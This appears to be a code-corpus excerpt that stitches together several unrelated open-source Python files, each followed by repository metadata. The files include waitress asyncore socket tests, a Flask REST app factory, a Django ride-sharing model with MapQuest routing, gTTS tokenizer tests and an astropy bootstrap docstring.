self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.close()
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_close_after_conn_broken(self):
# Check that ECONNRESET/EPIPE is correctly handled (issues #5661 and
# #11265).
data = b'\0' * 128
class TestClient(BaseClient):
def handle_write(self):
self.send(data)
def handle_close(self):
self.flag = True
self.close()
def handle_expt(self): # pragma: no cover
# needs to exist for MacOS testing
self.flag = True
self.close()
class TestHandler(BaseTestHandler):
def handle_read(self):
self.recv(len(data))
self.close()
def writable(self):
return False
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
@unittest.skipIf(sys.platform.startswith("sunos"),
"OOB support is broken on Solaris")
def test_handle_expt(self):
# Make sure handle_expt is called on OOB data received.
# Note: this might fail on some platforms as OOB data is
# tenuously supported and rarely used.
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
if sys.platform == "darwin" and self.use_poll: # pragma: no cover
self.skipTest("poll may fail on macOS; see issue #28087")
class TestClient(BaseClient):
def handle_expt(self):
self.socket.recv(1024, socket.MSG_OOB)
self.flag = True
class TestHandler(BaseTestHandler):
def __init__(self, conn):
BaseTestHandler.__init__(self, conn)
self.socket.send(
compat.tobytes(chr(244)), socket.MSG_OOB
)
server = BaseServer(self.family, self.addr, TestHandler)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_handle_error(self):
class TestClient(BaseClient):
def handle_write(self):
1.0 / 0
def handle_error(self):
self.flag = True
try:
raise
except ZeroDivisionError:
pass
else: # pragma: no cover
raise Exception("exception not raised")
server = BaseServer(self.family, self.addr)
client = TestClient(self.family, server.address)
self.loop_waiting_for_flag(client)
def test_connection_attributes(self):
server = BaseServer(self.family, self.addr)
client = BaseClient(self.family, server.address)
# we start disconnected
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
# this can't be taken for granted across all platforms
#self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# execute some loops so that client connects to server
asyncore.loop(timeout=0.01, use_poll=self.use_poll, count=100)
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertTrue(client.connected)
self.assertFalse(client.accepting)
# disconnect the client
client.close()
self.assertFalse(server.connected)
self.assertTrue(server.accepting)
self.assertFalse(client.connected)
self.assertFalse(client.accepting)
# stop serving
server.close()
self.assertFalse(server.connected)
self.assertFalse(server.accepting)
def test_create_socket(self):
s = asyncore.dispatcher()
s.create_socket(self.family)
#self.assertEqual(s.socket.type, socket.SOCK_STREAM)
self.assertEqual(s.socket.family, self.family)
self.assertEqual(s.socket.gettimeout(), 0)
#self.assertFalse(s.socket.get_inheritable())
def test_bind(self):
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
s1 = asyncore.dispatcher()
s1.create_socket(self.family)
s1.bind(self.addr)
s1.listen(5)
port = s1.socket.getsockname()[1]
s2 = asyncore.dispatcher()
s2.create_socket(self.family)
# EADDRINUSE indicates the socket was correctly bound
self.assertRaises(socket.error, s2.bind, (self.addr[0], port))
def test_set_reuse_addr(self): # pragma: no cover
if HAS_UNIX_SOCKETS and self.family == socket.AF_UNIX:
self.skipTest("Not applicable to AF_UNIX sockets.")
with closewrapper(socket.socket(self.family)) as sock:
try:
sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
except OSError:
unittest.skip("SO_REUSEADDR not supported on this platform")
else:
# if SO_REUSEADDR succeeded for sock we expect asyncore
# to do the same
s = asyncore.dispatcher(socket.socket(self.family))
self.assertFalse(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
s.socket.close()
s.create_socket(self.family)
s.set_reuse_addr()
self.assertTrue(s.socket.getsockopt(socket.SOL_SOCKET,
socket.SO_REUSEADDR))
@reap_threads
def test_quick_connect(self): # pragma: no cover
# see: http://bugs.python.org/issue10340
if self.family not in (socket.AF_INET,
getattr(socket, "AF_INET6", object())):
self.skipTest("test specific to AF_INET and AF_INET6")
server = BaseServer(self.family, self.addr)
# run the thread 500 ms: the socket should be connected in 200 ms
t = threading.Thread(target=lambda: asyncore.loop(timeout=0.1,
count=5))
t.start()
try:
sock = socket.socket(self.family, socket.SOCK_STREAM)
with closewrapper(sock) as s:
s.settimeout(.2)
s.setsockopt(socket.SOL_SOCKET, socket.SO_LINGER,
struct.pack('ii', 1, 0))
try:
s.connect(server.address)
except OSError:
pass
finally:
join_thread(t, timeout=TIMEOUT)
class TestAPI_UseIPv4Sockets(BaseTestAPI):
family = socket.AF_INET
addr = (HOST, 0)
@unittest.skipUnless(IPV6_ENABLED, 'IPv6 support required')
class TestAPI_UseIPv6Sockets(BaseTestAPI):
family = socket.AF_INET6
addr = (HOSTv6, 0)
@unittest.skipUnless(HAS_UNIX_SOCKETS, 'Unix sockets required')
class TestAPI_UseUnixSockets(BaseTestAPI):
if HAS_UNIX_SOCKETS:
family = socket.AF_UNIX
addr = TESTFN
def tearDown(self):
unlink(self.addr)
BaseTestAPI.tearDown(self)
class TestAPI_UseIPv4Select(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv4Poll(TestAPI_UseIPv4Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseIPv6Select(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseIPv6Poll(TestAPI_UseIPv6Sockets, unittest.TestCase):
use_poll = True
class TestAPI_UseUnixSocketsSelect(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = False
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class TestAPI_UseUnixSocketsPoll(TestAPI_UseUnixSockets, unittest.TestCase):
use_poll = True
class Test__strerror(unittest.TestCase):
def _callFUT(self, err):
from waitress.wasyncore import _strerror
return _strerror(err)
def test_gardenpath(self):
self.assertEqual(self._callFUT(1), 'Operation not permitted')
def test_unknown(self):
self.assertEqual(self._callFUT('wut'), 'Unknown error wut')
class Test_read(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import read
return read(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.read_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
class Test_write(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import write
return write(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.write_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.write_event_handled)
self.assertTrue(inst.error_handled)
class Test__exception(unittest.TestCase):
def _callFUT(self, dispatcher):
from waitress.wasyncore import _exception
return _exception(dispatcher)
def test_gardenpath(self):
inst = DummyDispatcher()
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_reraised(self):
from waitress.wasyncore import ExitNow
inst = DummyDispatcher(ExitNow)
self.assertRaises(ExitNow, self._callFUT, inst)
self.assertTrue(inst.expt_event_handled)
self.assertFalse(inst.error_handled)
def test_non_reraised(self):
inst = DummyDispatcher(OSError)
self._callFUT(inst)
self.assertTrue(inst.expt_event_handled)
self.assertTrue(inst.error_handled)
@unittest.skipUnless(hasattr(select, 'poll'), 'select.poll required')
class Test_readwrite(unittest.TestCase):
def _callFUT(self, obj, flags):
from waitress.wasyncore import readwrite
return readwrite(obj, flags)
def test_handle_read_event(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
def test_handle_write_event(self):
flags = 0
flags |= select.POLLOUT
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.write_event_handled)
def test_handle_expt_event(self):
flags = 0
flags |= select.POLLPRI
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.expt_event_handled)
def test_handle_close(self):
flags = 0
flags |= select.POLLHUP
inst = DummyDispatcher()
self._callFUT(inst, flags)
self.assertTrue(inst.close_handled)
def test_socketerror_not_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.EALREADY, 'EALREADY'))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.error_handled)
def test_socketerror_in_disconnected(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(socket.error(errno.ECONNRESET, 'ECONNRESET'))
self._callFUT(inst, flags)
self.assertTrue(inst.read_event_handled)
self.assertTrue(inst.close_handled)
def test_exception_in_reraised(self):
from waitress import wasyncore
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(wasyncore.ExitNow)
self.assertRaises(wasyncore.ExitNow, self._callFUT, inst, flags)
self.assertTrue(inst.read_event_handled)
def test_exception_not_in_reraised(self):
flags = 0
flags |= select.POLLIN
inst = DummyDispatcher(ValueError)
self._callFUT(inst, flags)
self.assertTrue(inst.error_handled)
class Test_poll(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from waitress.wasyncore import poll
return poll(timeout, map)
def test_nothing_writable_nothing_readable_but_map_not_empty(self):
# i read the mock.patch docs. nerp.
dummy_time = DummyTime()
map = {0:DummyDispatcher()}
try:
from waitress import wasyncore
old_time = wasyncore.time
wasyncore.time = dummy_time
result = self._callFUT(map=map)
finally:
wasyncore.time = old_time
self.assertEqual(result, None)
self.assertEqual(dummy_time.sleepvals, [0.0])
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EINTR))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
result = self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(result, None)
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
dummy_select = DummySelect(select.error(errno.EBADF))
disp = DummyDispatcher()
disp.readable = lambda: True
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(dummy_select.selected, [([0], [], [0], 0.0)])
class Test_poll2(unittest.TestCase):
def _callFUT(self, timeout=0.0, map=None):
from waitress.wasyncore import poll2
return poll2(timeout, map)
def test_select_raises_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EINTR))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self._callFUT(map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
def test_select_raises_non_EINTR(self):
# i read the mock.patch docs. nerp.
pollster = DummyPollster(exc=select.error(errno.EBADF))
dummy_select = DummySelect(pollster=pollster)
disp = DummyDispatcher()
map = {0:disp}
try:
from waitress import wasyncore
old_select = wasyncore.select
wasyncore.select = dummy_select
self.assertRaises(select.error, self._callFUT, map=map)
finally:
wasyncore.select = old_select
self.assertEqual(pollster.polled, [0.0])
class Test_dispatcher(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from waitress.wasyncore import dispatcher
return dispatcher(sock=sock, map=map)
def test_unexpected_getpeername_exc(self):
sock = dummysocket()
def getpeername():
raise socket.error(errno.EBADF)
map = {}
sock.getpeername = getpeername
self.assertRaises(socket.error, self._makeOne, sock=sock, map=map)
self.assertEqual(map, {})
def test___repr__accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
inst.addr = ('localhost', 8080)
result = repr(inst)
expected = '<waitress.wasyncore.dispatcher listening localhost:8080 at'
self.assertEqual(result[:len(expected)], expected)
def test___repr__connected(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = False
inst.connected = True
inst.addr = ('localhost', 8080)
result = repr(inst)
expected = '<waitress.wasyncore.dispatcher connected localhost:8080 at'
self.assertEqual(result[:len(expected)], expected)
def test_set_reuse_addr_with_socketerror(self):
sock = dummysocket()
map = {}
def setsockopt(*arg, **kw):
sock.errored = True
raise socket.error
sock.setsockopt = setsockopt
sock.getsockopt = lambda *arg: 0
inst = self._makeOne(sock=sock, map=map)
inst.set_reuse_addr()
self.assertTrue(sock.errored)
def test_connect_raise_socket_error(self):
sock = dummysocket()
map = {}
sock.connect_ex = lambda *arg: 1
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.connect, 0)
def test_accept_raise_TypeError(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise TypeError
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
result = inst.accept()
self.assertEqual(result, None)
def test_accept_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def accept(*arg, **kw):
raise socket.error(122)
sock.accept = accept
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.accept)
def test_send_raise_EWOULDBLOCK(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(errno.EWOULDBLOCK)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
result = inst.send('a')
self.assertEqual(result, 0)
def test_send_raise_unexpected_socketerror(self):
sock = dummysocket()
map = {}
def send(*arg, **kw):
raise socket.error(122)
sock.send = send
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.send, 'a')
def test_recv_raises_disconnect(self):
sock = dummysocket()
map = {}
def recv(*arg, **kw):
raise socket.error(errno.ECONNRESET)
def handle_close():
inst.close_handled = True
sock.recv = recv
inst = self._makeOne(sock=sock, map=map)
inst.handle_close = handle_close
result = inst.recv(1)
self.assertEqual(result, b'')
self.assertTrue(inst.close_handled)
def test_close_raises_unknown_socket_error(self):
sock = dummysocket()
map = {}
def close():
raise socket.error(122)
sock.close = close
inst = self._makeOne(sock=sock, map=map)
inst.del_channel = lambda: None
self.assertRaises(socket.error, inst.close)
def test_handle_read_event_not_accepting_not_connected_connecting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_connect_event():
inst.connect_event_handled = True
def handle_read():
inst.read_handled = True
inst.handle_connect_event = handle_connect_event
inst.handle_read = handle_read
inst.accepting = False
inst.connected = False
inst.connecting = True
inst.handle_read_event()
self.assertTrue(inst.connect_event_handled)
self.assertTrue(inst.read_handled)
def test_handle_connect_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
self.assertRaises(socket.error, inst.handle_connect_event)
def test_handle_expt_event_getsockopt_returns_error(self):
sock = dummysocket()
sock.getsockopt = lambda *arg: 122
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
inst.handle_close = handle_close
inst.handle_expt_event()
self.assertTrue(inst.close_handled)
def test_handle_write_event_while_accepting(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.accepting = True
result = inst.handle_write_event()
self.assertEqual(result, None)
def test_handle_error_gardenpath(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def handle_close():
inst.close_handled = True
def compact_traceback(*arg, **kw):
return None, None, None, None
def log_info(self, *arg):
inst.logged_info = arg
inst.handle_close = handle_close
inst.compact_traceback = compact_traceback
inst.log_info = log_info
inst.handle_error()
self.assertTrue(inst.close_handled)
self.assertEqual(inst.logged_info, ('error',))
def test_handle_close(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
def log_info(self, *arg):
inst.logged_info = arg
def close():
inst._closed = True
inst.log_info = log_info
inst.close = close
inst.handle_close()
self.assertTrue(inst._closed)
def test_handle_accepted(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.handle_accepted(sock, '1')
self.assertTrue(sock.closed)
class Test_dispatcher_with_send(unittest.TestCase):
def _makeOne(self, sock=None, map=None):
from waitress.wasyncore import dispatcher_with_send
return dispatcher_with_send(sock=sock, map=map)
def test_writable(self):
sock = dummysocket()
map = {}
inst = self._makeOne(sock=sock, map=map)
inst.out_buffer = b'123'
inst.connected = True
self.assertTrue(inst.writable())
class Test_close_all(unittest.TestCase):
def _callFUT(self, map=None, ignore_all=False):
from waitress.wasyncore import close_all
return close_all(map, ignore_all)
def test_socketerror_on_close_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EBADF))
map = {0:disp}
self._callFUT(map)
self.assertEqual(map, {})
def test_socketerror_on_close_non_ebadf(self):
disp = DummyDispatcher(exc=socket.error(errno.EAGAIN))
map = {0:disp}
self.assertRaises(socket.error, self._callFUT, map)
def test_reraised_exc_on_close(self):
disp = DummyDispatcher(exc=KeyboardInterrupt)
map = {0:disp}
self.assertRaises(KeyboardInterrupt, self._callFUT, map)
def test_unknown_exc_on_close(self):
disp = DummyDispatcher(exc=RuntimeError)
map = {0:disp}
self.assertRaises(RuntimeError, self._callFUT, map)
class DummyDispatcher(object):
read_event_handled = False
write_event_handled = False
expt_event_handled = False
error_handled = False
close_handled = False
accepting = False
def __init__(self, exc=None):
self.exc = exc
def handle_read_event(self):
self.read_event_handled = True
if self.exc is not None:
raise self.exc
def handle_write_event(self):
self.write_event_handled = True
if self.exc is not None:
raise self.exc
def handle_expt_event(self):
self.expt_event_handled = True
if self.exc is not None:
raise self.exc
def handle_error(self):
self.error_handled = True
def handle_close(self):
self.close_handled = True
def readable(self):
return False
def writable(self):
return False
def close(self):
if self.exc is not None:
raise self.exc
class DummyTime(object):
def __init__(self):
self.sleepvals = []
def sleep(self, val):
self.sleepvals.append(val)
class DummySelect(object):
error = select.error
def __init__(self, exc=None, pollster=None):
self.selected = []
self.pollster = pollster
self.exc = exc
def select(self, *arg):
self.selected.append(arg)
if self.exc is not None:
raise self.exc
def poll(self):
return self.pollster
class DummyPollster(object):
def __init__(self, exc=None):
self.polled = []
self.exc = exc
def poll(self, timeout):
self.polled.append(timeout)
if self.exc is not None:
raise self.exc
else: # pragma: no cover
return []
|
ianastewart/cwltc-admin
|
venv/Lib/site-packages/waitress/tests/test_wasyncore.py
|
Python
|
mit
| 54,410
|
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
from flask import Flask
from flask_migrate import Migrate, MigrateCommand
from flask_script import Manager
from flask_user import UserManager, SQLAlchemyAdapter
from flask_ripozo import FlaskDispatcher
from .models import db, User
from .resources import UserResource, ResourceResource, RelationshipResource
import click
def create_app(config=None):
app = Flask('rest_builder')
app.config.from_pyfile(config)
manager = Manager(app)
migrate = setup_db(app=app, manager=manager)
register_resources(app)
db_adapter = SQLAlchemyAdapter(db, User)
user_manager = UserManager(db_adapter, app)
return app, migrate, manager
def setup_db(app=None, manager=None):
if app:
db.init_app(app)
migrate = Migrate(app=app, db=db)
if manager:
manager.add_command('db', MigrateCommand)
return migrate
def register_resources(app):
dispatcher = FlaskDispatcher(app, url_prefix='/api')
dispatcher.register_resources(UserResource, RelationshipResource, ResourceResource)
@click.command()
def run_app():
# create_app() returns (app, migrate, manager); unpack before calling run()
app, migrate, manager = create_app(config='default_config.py')
app.run(debug=True)
if __name__ == '__main__':
run_app()
|
timmartin19/browser-REST-builder
|
rest_builder/app.py
|
Python
|
mit
| 1,334
|
import time
import datetime
import threading
from django.apps import AppConfig
from django_eventstream import send_event
class TimeappConfig(AppConfig):
name = 'timeapp'
def ready(self):
ensure_worker_started()
worker_started = False
def ensure_worker_started():
global worker_started
if worker_started:
return
if not is_db_ready():
return
worker_started = True
thread = threading.Thread(target=send_worker)
thread.daemon = True
thread.start()
def send_worker():
while True:
data = datetime.datetime.utcnow().isoformat()
send_event('time', 'message', data)
time.sleep(1)
def is_db_ready():
from django.db import DatabaseError
from django_eventstream.models import Event
try:
# see if db tables are present
Event.objects.count()
return True
except DatabaseError:
return False
|
fanout/django-eventstream
|
examples/time/timeapp/apps.py
|
Python
|
mit
| 926
|
# -*- coding: utf-8 -*-
import unittest
import re
from gtts.tokenizer.core import RegexBuilder, PreProcessorRegex, PreProcessorSub, Tokenizer
# Tests based on classes usage examples
# See class documentation for details
class TestRegexBuilder(unittest.TestCase):
def test_regexbuilder(self):
rb = RegexBuilder('abc', lambda x: "{}".format(x))
self.assertEqual(rb.regex, re.compile('a|b|c'))
class TestPreProcessorRegex(unittest.TestCase):
def test_preprocessorregex(self):
pp = PreProcessorRegex('ab', lambda x: "{}".format(x), 'c')
self.assertEqual(len(pp.regexes), 2)
self.assertEqual(pp.regexes[0].pattern, 'a')
self.assertEqual(pp.regexes[1].pattern, 'b')
class TestPreProcessorSub(unittest.TestCase):
def test_preprocessorsub(self):
sub_pairs = [('Mac', 'PC'), ('Firefox', 'Chrome')]
pp = PreProcessorSub(sub_pairs)
_in = "I use firefox on my mac"
_out = "I use Chrome on my PC"
self.assertEqual(pp.run(_in), _out)
class TestTokenizer(unittest.TestCase):
# tokenizer case 1
def case1(self):
return re.compile(r"\,")
# tokenizer case 2
def case2(self):
return RegexBuilder('abc', lambda x: r"{}\.".format(x)).regex
def test_tokenizer(self):
t = Tokenizer([self.case1, self.case2])
_in = "Hello, my name is Linda a. Call me Lin, b. I'm your friend"
_out = [
'Hello',
' my name is Linda ',
' Call me Lin',
' ',
" I'm your friend"]
self.assertEqual(t.run(_in), _out)
def test_bad_params_not_list(self):
# original exception: TypeError
with self.assertRaises(TypeError):
Tokenizer(self.case1)
def test_bad_params_not_callable(self):
# original exception: TypeError
with self.assertRaises(TypeError):
Tokenizer([100])
def test_bad_params_not_callable_returning_regex(self):
# original exception: AttributeError
def not_regex():
return 1
with self.assertRaises(TypeError):
Tokenizer([not_regex])
if __name__ == '__main__':
unittest.main()
|
pndurette/gTTS
|
gtts/tokenizer/tests/test_core.py
|
Python
|
mit
| 2,202
|
import json
import requests
from core.models import Client, Driver
from core.serializers import ClientSerializer
from django.conf import settings
from django.db import models
from django.utils import timezone
from pyfcm import FCMNotification
PUSH_SERVICE = FCMNotification(api_key=settings.FIREBASE_DRIVER_KEY)
class Ride(models.Model):
created_on = models.DateTimeField(auto_now_add=True)
active = models.BooleanField(default=False)
pickup_latitude = models.FloatField()
pickup_longitude = models.FloatField()
drop_latitude = models.FloatField()
drop_longitude = models.FloatField()
client = models.ForeignKey(Client, related_name='rides')
request_received_at = models.DateTimeField(null=True, blank=True)
request_processed_at = models.DateTimeField(null=True, blank=True)
initial_eta = models.FloatField(null=True, blank=True)
pickup_at = models.DateTimeField(null=True, blank=True)
drop_at = models.DateTimeField(null=True, blank=True)
serviced_by = models.ForeignKey(Driver, related_name='rides', null=True, blank=True)
deleted = models.BooleanField(default=True)
def __unicode__(self):
return "%s - %s" % (self.client, self.created_on)
class DriverLocation(models.Model):
driver = models.ForeignKey(Driver, related_name="location")
latitude = models.FloatField()
longitude = models.FloatField()
timestamp = models.DateTimeField()
latest = models.BooleanField(default=False)
def __unicode__(self):
return "%s %s" % (self.driver, self.timestamp.strftime("%H:%M:%S"))
def dijkstra(matrix, m=None, n=None):
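# Despite the generic signature, this is Dijkstra's single-source shortest
# paths from node 0 over a dense cost/time matrix: ``offsets`` is the order
# in which nodes are finalized and ``cost[0]`` ends up holding the shortest
# distance from node 0 to every other node. The literal 999 acts as
# "infinity", so the routine is only meaningful for matrices whose entries
# stay well below that value.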
m = n = len(matrix)
k = 0
cost = [[0 for x in range(m)] for x in range(1)]
offsets = [k]
elepos = 0
for j in range(m):
cost[0][j] = matrix[k][j]
mini = 999
for x in range(m - 1):
mini = 999
for j in range(m):
if cost[0][j] <= mini and j not in offsets:
mini = cost[0][j]
elepos = j
offsets.append(elepos)
for j in range(m):
if cost[0][j] > cost[0][elepos] + matrix[elepos][j]:
cost[0][j] = cost[0][elepos] + matrix[elepos][j]
return offsets, cost[0]
def calculate_route(client_id=None):
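# Build a MapQuest "routematrix" request from the driver's latest position
# plus up to eight active rides (drop point if already serviced, pickup
# point otherwise), turn the returned time matrix into an ordered path with
# cumulative ETAs, optionally push that path to the driver via FCM, and
# return it (together with the requesting client's ETA when client_id is
# given).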
mapquest_url = "https://www.mapquestapi.com/directions/v2/routematrix?key=%s" % settings.MAPQUEST_KEY
request_body = {
"options": {
"allToAll": True
}
}
locations = []
current_driver_location = DriverLocation.objects.filter(latest=True).order_by("-timestamp")
current_driver_location = current_driver_location[0]
locations.append({
"latLng": {
"lat": current_driver_location.latitude,
"lng": current_driver_location.longitude,
},
"user": "Driver",
"custom_type": "start"
})
for location in Ride.objects.filter(active=True, deleted=False).order_by("request_received_at")[:8]:
if location.serviced_by:
locations.append({
"latLng": {
"lat": location.drop_latitude,
"lng": location.drop_longitude
},
"user": ClientSerializer(location.client).data,
"custom_type": "drop",
"ride_id": location.pk,
"request_time": location.request_received_at.strftime("%s"),
"pickup_at": location.pickup_at.strftime("%s")
})
else:
locations.append({
"latLng": {
"lat": location.pickup_latitude,
"lng": location.pickup_longitude
},
"user": ClientSerializer(location.client).data,
"custom_type": "pick",
"ride_id": location.pk,
"request_time": location.request_received_at.strftime("%s"),
"pickup_at": None
})
location.request_processed_at = timezone.now()
request_body['locations'] = locations
if len(locations) > 0:
response = requests.post(mapquest_url, data=json.dumps(request_body))
if response.status_code == 200:
try:
time_matrix = json.loads(response.content)['time']
except:
return None, None
path = [i for i in range(0, len(time_matrix))]
cost_matrix = time_matrix[0]
# path, cost_matrix = dijkstra(time_matrix)
eta = 0
path_in_co_ordinates = [{
"latLng": locations[0]['latLng'],
"user": "driver",
"eta": eta
}]
for index in range(1, len(path)):
eta += cost_matrix[index]
path_in_co_ordinates.append({
"latLng": locations[path[index]]['latLng'],
"user": locations[path[index]]['user'],
"type": locations[path[index]]['custom_type'],
"eta": eta,
"ride_id": locations[path[index]]['ride_id'],
"request_time": locations[path[index]]['request_time'],
"pickup_at": locations[path[index]]['pickup_at']
})
if client_id:
eta_for_client = 0
for i in range(1, len(path_in_co_ordinates)):
if path_in_co_ordinates[i]["user"]["id"] == client_id:
eta_for_client = path_in_co_ordinates[i]["eta"]
if current_driver_location.driver.push_notification_token:
result = PUSH_SERVICE.notify_single_device(
registration_id=current_driver_location.driver.push_notification_token,
data_message={"path": path_in_co_ordinates}, message_body={"path": path_in_co_ordinates})
return path_in_co_ordinates, eta_for_client
return path_in_co_ordinates
else:
print "error"
else:
return None
|
cmpe-295/project-backend
|
safe_ride/ride/models.py
|
Python
|
mit
| 6,027
|
def ninja_io(args):
"""Return the inputs/outputs as a single string
Args:
args (str | list): a string or list of strings
Returns:
a string
"""
if isinstance(args, list):
return " ".join(list(map(str, args)))
else:
return str(args)
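# Example usage (illustrative only):
#   ninja_io(["in1.txt", "in2.txt"])  ->  "in1.txt in2.txt"
#   ninja_io("single_input.txt")      ->  "single_input.txt"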
|
yuhangwang/ninjag-python
|
ninjag/core/ninja_io.py
|
Python
|
mit
| 288
|
"""
This bootstrap module contains code for ensuring that the astropy_helpers
package will be importable by the time the setup.py script runs. It also
includes some workarounds to ensure that a recent-enough version of setuptools
is being used for the installation.
This module should be the first thing imported in the setup.py of distributions
that make use of the utilities in astropy_helpers. If the distribution ships
with its own copy of astropy_helpers, this module will first attempt to import
from the shipped copy. However, it will also check PyPI to see if there are
any bug-fix releases on top of the current version that may be useful to get
past platform-specific bugs that have been fixed. When running setup.py, use
the ``--offline`` command-line option to disable the auto-upgrade checks.
When this module is imported or otherwise executed it automatically calls a
main function that attempts to read the project's setup.cfg file, which it
checks for a configuration section called ``[ah_bootstrap]``; the presence
of that section, and the options therein, determines the next step taken: if it
contains an option called ``auto_use`` with a value of ``True``, it will
automatically call the main function of this module called
`use_astropy_helpers` (see that function's docstring for full details).
Otherwise no further action is taken and by default the system-installed version
of astropy-helpers will be used (however, ``ah_bootstrap.use_astropy_helpers``
may be called manually from within the setup.py script).
This behavior can also be controlled using the ``--auto-use`` and
``--no-auto-use`` command-line flags. For clarity, an alias for
``--no-auto-use`` is ``--use-system-astropy-helpers``, and we recommend using
the latter if needed.
Additional options in the ``[ah_bootstrap]`` section of setup.cfg have the same
names as the arguments to `use_astropy_helpers`, and can be used to configure
the bootstrap script when ``auto_use = True``.
See https://github.com/astropy/astropy-helpers for more details, and for the
latest version of this module.
"""
import contextlib
import errno
import imp
import io
import locale
import os
import re
import subprocess as sp
import sys
try:
from ConfigParser import ConfigParser, RawConfigParser
except ImportError:
from configparser import ConfigParser, RawConfigParser
if sys.version_info[0] < 3:
_str_types = (str, unicode)
_text_type = unicode
PY3 = False
else:
_str_types = (str, bytes)
_text_type = str
PY3 = True
# What follows are several import statements meant to deal with install-time
# issues with either missing or misbehaving packages (including making sure
# setuptools itself is installed):
# Some pre-setuptools checks to ensure that either distribute or setuptools >=
# 0.7 is used (over pre-distribute setuptools) if it is available on the path;
